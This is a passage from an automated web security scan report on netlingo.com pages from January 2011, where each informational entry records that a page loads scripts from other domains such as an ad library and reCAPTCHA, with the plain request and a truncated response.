Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1163. http://www.netlingo.com/press/print.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/print.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/print.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 101161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1164. http://www.netlingo.com/press/teen-text-talk.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/teen-text-talk.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/teen-text-talk.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1165. http://www.netlingo.com/press/web.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /press/web.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /press/web.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 80087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1166. http://www.netlingo.com/register-premium.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /register-premium.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /register-premium.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 56600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1167. http://www.netlingo.com/register.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /register.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1168. http://www.netlingo.com/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /search.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /search.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1169. http://www.netlingo.com/shop/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ubh5bqn9kj4a5lcoor3k51ph52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1170. http://www.netlingo.com/shop/netlingo-the-dictionary.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/netlingo-the-dictionary.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/netlingo-the-dictionary.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1171. http://www.netlingo.com/shop/netlingo-the-list.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/netlingo-the-list.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/netlingo-the-list.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1172. http://www.netlingo.com/shop/online-store.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/online-store.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/online-store.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1173. http://www.netlingo.com/shop/shopping-cart.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /shop/shopping-cart.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /shop/shopping-cart.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ogucvrimkkhjf3ddi951jdps62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1174. http://www.netlingo.com/smileys.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /smileys.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /smileys.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1175. http://www.netlingo.com/subscribe.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /subscribe.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /subscribe.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1176. http://www.netlingo.com/tips/color-guide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/color-guide.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/color-guide.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1177. http://www.netlingo.com/tips/cyber-safety-statistics.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/cyber-safety-statistics.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/cyber-safety-statistics.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1178. http://www.netlingo.com/tips/file-extensions.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/file-extensions.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/file-extensions.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 49172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1179. http://www.netlingo.com/tips/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1180. http://www.netlingo.com/tips/resources.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/resources.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/resources.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 73582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1181. http://www.netlingo.com/tips/webcasts.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/webcasts.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tips/webcasts.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1182. http://www.netlingo.com/tools/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1183. http://www.netlingo.com/tools/online-store.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/online-store.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/online-store.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 31802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1184. http://www.netlingo.com/tools/pocket-dictionary.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/pocket-dictionary.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/pocket-dictionary.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1185. http://www.netlingo.com/tools/search-browse-box.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/search-browse-box.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/search-browse-box.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1186. http://www.netlingo.com/tools/toolbar.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/toolbar.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/toolbar.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1187. http://www.netlingo.com/tools/widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/widget.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/widget.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1188. http://www.netlingo.com/tools/wotd.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/wotd.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /tools/wotd.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
